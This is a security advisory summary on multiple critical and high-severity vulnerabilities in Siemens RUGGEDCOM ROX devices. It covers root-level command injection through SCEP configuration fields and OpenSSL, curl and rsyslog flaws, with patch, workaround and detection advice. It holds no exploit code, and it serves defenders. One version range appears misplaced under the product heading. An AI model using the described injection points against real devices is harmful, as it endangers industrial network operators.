Full Report
Devices based on RUGGEDCOM ROX before V2.16 contain multiple high severity vulnerabilities, including the third-party vulnerabilities: CVE-2022-24903, CVE-2022-2068, CVE-2021-22946, CVE-2022-22576, CVE-2022-27781, CVE-2022-27782, CVE-2022-32207, CVE-2022-1292. Siemens has released updates for the affected products and recommends to update to the latest versions.
Analysis Summary
# Vulnerability: Multiple High Severity Flaws in RUGGEDCOM ROX
## CVE Details
The advisory covers several high-severity vulnerabilities. Key identifiers include:
| CVE ID | CVSS Score | CWE | Type |
| :--- | :--- | :--- | :--- |
| **CVE-2022-1292** | 9.8 (Critical) | CWE-78 | OS Command Injection (OpenSSL) |
| **CVE-2022-2068** | 9.8 (Critical) | CWE-78 | OS Command Injection (OpenSSL) |
| **CVE-2023-36754**| 9.1 (Critical) | CWE-77 | Command Injection (SCEP URL) |
| **CVE-2023-36755**| 9.1 (Critical) | CWE-77 | Command Injection (SCEP CA Name) |
| **CVE-2022-22576**| 8.1 (High) | CWE-287 | Improper Authentication (curl) |
| **CVE-2022-24903**| 8.1 (High) | CWE-120 | Buffer Overflow (rsyslog) |
| **CVE-2021-22946**| 7.5 (High) | CWE-319 | Cleartext Transmission (curl) |
| **CVE-2022-27781**| 7.5 (High) | CWE-400 | Resource Consumption (curl) |
## Affected Systems
* **Products:** RUGGEDCOM ROX-based devices (including MX5000, RX1400, RX1500 series, RX5000 series).
* **Versions:** All versions prior to **V2.16.0**. Specifically mentions versions 7.20.0 through 7.78.0 for certain components.
* **Configurations:** Systems using SCEP (Simple Certificate Enrollment Protocol), web-based management interfaces, or rsyslog with octet-counted framing enabled.
## Vulnerability Description
The advisory addresses two main categories of flaws:
1. **Third-Party Library Vulnerabilities:** Issues in OpenSSL (c_rehash script command injection), curl (authentication bypass and TLS stripping), and rsyslog (heap buffer overflow in TCP reception). These allow for remote code execution, data intercept, or DoS.
2. **Native ROX Vulnerabilities:** Improper input sanitation in the RUGGEDCOM ROX web interface. Specifically, the SCEP server configuration parameters (URL and CA Certificate Name) fail to filter shell metacharacters, allowing authenticated attackers to execute commands with **root privileges**.
## Exploitation
* **Status:** PoC available (indicated by 'E:P' in CVSS vectors for multiple CVEs).
* **Complexity:** Low to High (depending on the specific CVE; SCEP injections are Low complexity).
* **Attack Vector:** Network.
## Impact
* **Confidentiality:** High (Full access to system data and encrypted traffic interception).
* **Integrity:** High (Ability to modify system configurations or execute arbitrary code).
* **Availability:** High (Potential for system crashes or permanent loss of control via root access).
## Remediation
### Patches
Siemens recommends upgrading all RUGGEDCOM ROX-based devices to **V2.16.0** or later.
* Download via Siemens Industry Online Support: hxxps://support.industry.siemens.com/
### Workarounds
* **Authentication & Access:** Limit access to the web interface to trusted administrative networks only.
* **Feature Management:** Disable SCEP features if not required by the environment.
* **Network Segmentation:** Protect the management port (MGT) behind a firewall and ensure it is not reachable from the public internet.
## Detection
* **Indicators of Compromise:** Monitor for unusual shell activity initiated by the web server process. Inspect system logs for malformed SCEP configuration strings or unexpected "root" user commands.
* **Scanning:** Use vulnerability scanners to identify RUGGEDCOM ROX versions below V2.16.
## References
* Siemens Security Advisory SSA-146325: hxxps://cert-portal.siemens.com/productcert/pdf/ssa-146325.pdf
* Siemens ProductCERT: hxxps://www.siemens.com/cert/advisories